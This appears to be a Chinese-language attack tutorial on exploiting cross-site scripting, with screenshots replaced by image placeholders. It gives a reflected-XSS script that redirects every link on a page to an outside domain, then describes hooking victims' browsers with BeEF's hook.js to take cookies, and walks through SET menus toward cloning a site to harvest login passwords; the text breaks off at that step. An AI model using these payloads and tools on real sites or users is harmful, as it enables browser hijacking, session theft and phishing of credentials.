反射型的一些玩法

1:反射型提交xss,get到url后面更上xss攻击代码,再次点击页面所有的A标签都是跳转到目标地址poc代码如下

<script>
window.onload = function() {
var link=document.getElementsByTagName("a");
for(j = 0; j < link.length; j++) {
 link[j].href="http://cft6.vip";}
}
</script>

2:使用kali中的 beef 劫持用户浏览器

beef是个ruby开发的框架,kali自带,2006创建,现在还在维护,攻击目的说白了就是让用户勾上你的hook.js文件

image.png

执行的过程，就像这种恶意弹窗：

image.png

zombie（僵尸）即受害的浏览器。zombie 是被 hook（勾连）的，如果浏览器访问了有勾子（由 js

编写）的页面，就会被 hook，勾连的浏览器会执行初始代码返回一些信息，接着 zombie 会每隔一段时

间（默认为 1 秒）就会向 BeEF 服务器发送一个请求，询问是否有新的代码需要执行。BeEF 服务器本质

上就像一个 Web 应用，被分为前端 UI，和后端。前端会轮询后端是否有新的数据需要更新，同时前端

也可以向后端发送指示， BeEF 持有者可以通过浏览器来登录 BeEF 的后台管理 UI。

image.png

开始: 1:将上图生成的hook.js文件写个一个HTML文件, 然后再次把第一个的代码跳转地址修改成这个HTML文件 , 访问这个HTML文件即加载hook.js ,适当可以做转码处理.

在 kali 上登录 beef 后台迚行查看

http://127.0.0.1:3000/ui/panel

在/usr/share/beef-xss/config.yaml 中查看 beef 初始用户和默认密码

image.png

之后可以进行一系列的操作,获取cookie/弹窗之类~

持久型的一些玩法

1: 使用setoolkit克隆站点,拿到用户登录站点的密码

Setoolkit 是一个万能的社工工具（社会工程学工具集合)

Kali输入setoolkit即可

image.png

**1）社会工程攻击**

**2）渗透测试（快速通道）**

**3）第三方模块**

**4）更新社会工程师工具包**

**5）更新 SET 配置**

**6）帮劣，积分和关于**

**99）退出社会工程师工具包**

选择 2 网站攻击载体

image.png
菜单:

**1）矛网钓鱼攻击载体**

**2）网站攻击载体**

**3）传染媒介发生器**

**4）创建有效负载和侦听器**

**5）群发邮件攻击**

**6）基于 Arduino 的攻击向量**

**7）无线接入点攻击向量**

**8）QRcode 生成器攻击向量**

**9）PowerShell 攻击向量**

**10）短信欺骗攻击载体**

**11）第三方模块**

**99）返回主菜单。**

选择 3: 凭证收割机攻击方法